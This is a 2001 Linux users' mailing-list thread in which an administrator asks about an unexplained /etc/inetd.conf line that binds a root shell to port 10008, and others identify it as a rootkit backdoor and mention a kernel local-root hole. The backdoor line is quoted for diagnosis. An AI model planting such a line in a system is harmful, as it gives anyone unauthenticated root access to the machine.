im using default kernel of RH 6.2 and services such as DNS/mail radius
server. I have a lot of local users for dial-up and shell access. I guess
i really have to upgrade..sometime.
thanks,
dwen
>
> did you update lpr?
> what other services are open?
>
> Do you have local users? kernels < 2.2.19 have a local root exploit
>
> and of course, don't discount the possibility of a root password leak..
>
>
> On Tue, 22 May 2001, dwen wrote:
>
> >
> >
> > im using tcp wrappers, bind 9.1.0 and apache 1.3.19, telnet and ftp are
> > both disbled...how the heck he do that ?!
> >
> >
> > hope its not that late...
> >
> > thanks
> > dwen
> >
> >
> > On Tue, 22 May 2001, Ian C. Sison wrote:
> >
> > >
> > > it's a back door installed by a root-kit which will allow root shell
> > > access to your machine to anyone telnetting to port 10008
> > >
> > > On Tue, 22 May 2001, dwen wrote:
> > >
> > > >
> > > >
> > > > its not running, im just wondering why there's a line like that.
> > > >
> > > >
> > > >
> > > > thanks,
> > > > dwen
> > > >
> > > >
> > > > On Tue, 22 May 2001, Ian C. Sison wrote:
> > > >
> > > > >
> > > > > Gee, you can find out for yourself
> > > > >
> > > > > try:
> > > > >
> > > > > telnet your-box-name 10008
> > > > >
> > > > > \8)
> > > > >
> > > > >
> > > > > On Tue, 22 May 2001, dwen wrote:
> > > > >
> > > > > >
> > > > > >
> > > > > > file: /etc/inetd.conf
> > > > > > i have this line :
> > > > > >
> > > > > > 10008 stream tcp nowait root /bin/sh sh
> > > > > >
> > > > > > what will it do ?
> > > > > >
> > > > > >
> > > > > > thanks,
> > > > > > dwen
> > > > > >
> > > > > >
> > > > > > _
> > > > > > Philippine Linux Users Group. Web site and archives at
>http://plug.linux.org.ph
> > > > > > To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
> > > > > >
> > > > > > To subscribe to the Linux Newbies' List: send "subscribe" in the body to
>[EMAIL PROTECTED]
> > > > > >
> > > > >
> > > > > _
> > > > > Philippine Linux Users Group. Web site and archives at
>http://plug.linux.org.ph
> > > > > To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
> > > > >
> > > > > To subscribe to the Linux Newbies' List: send "subscribe" in the body to
>[EMAIL PROTECTED]
> > > > >
> > > >
> > > > _
> > > > Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
> > > > To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
> > > >
> > > > To subscribe to the Linux Newbies' List: send "subscribe" in the body to
>[EMAIL PROTECTED]
> > > >
> > >
> > > _
> > > Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
> > > To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
> > >
> > > To subscribe to the Linux Newbies' List: send "subscribe" in the body to
>[EMAIL PROTECTED]
> > >
> >
> > _
> > Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
> > To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
> >
> > To subscribe to the Linux Newbies' List: send "subscribe" in the body to
>[EMAIL PROTECTED]
> >
>
> _
> Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
> To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
>
> To subscribe to the Linux Newbies' List: send "subscribe" in the body to
>[EMAIL PROTECTED]
>
_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
To subscribe to the Linux Newbies' List: send "subscribe" in the body to
[EMAIL PROTECTED]
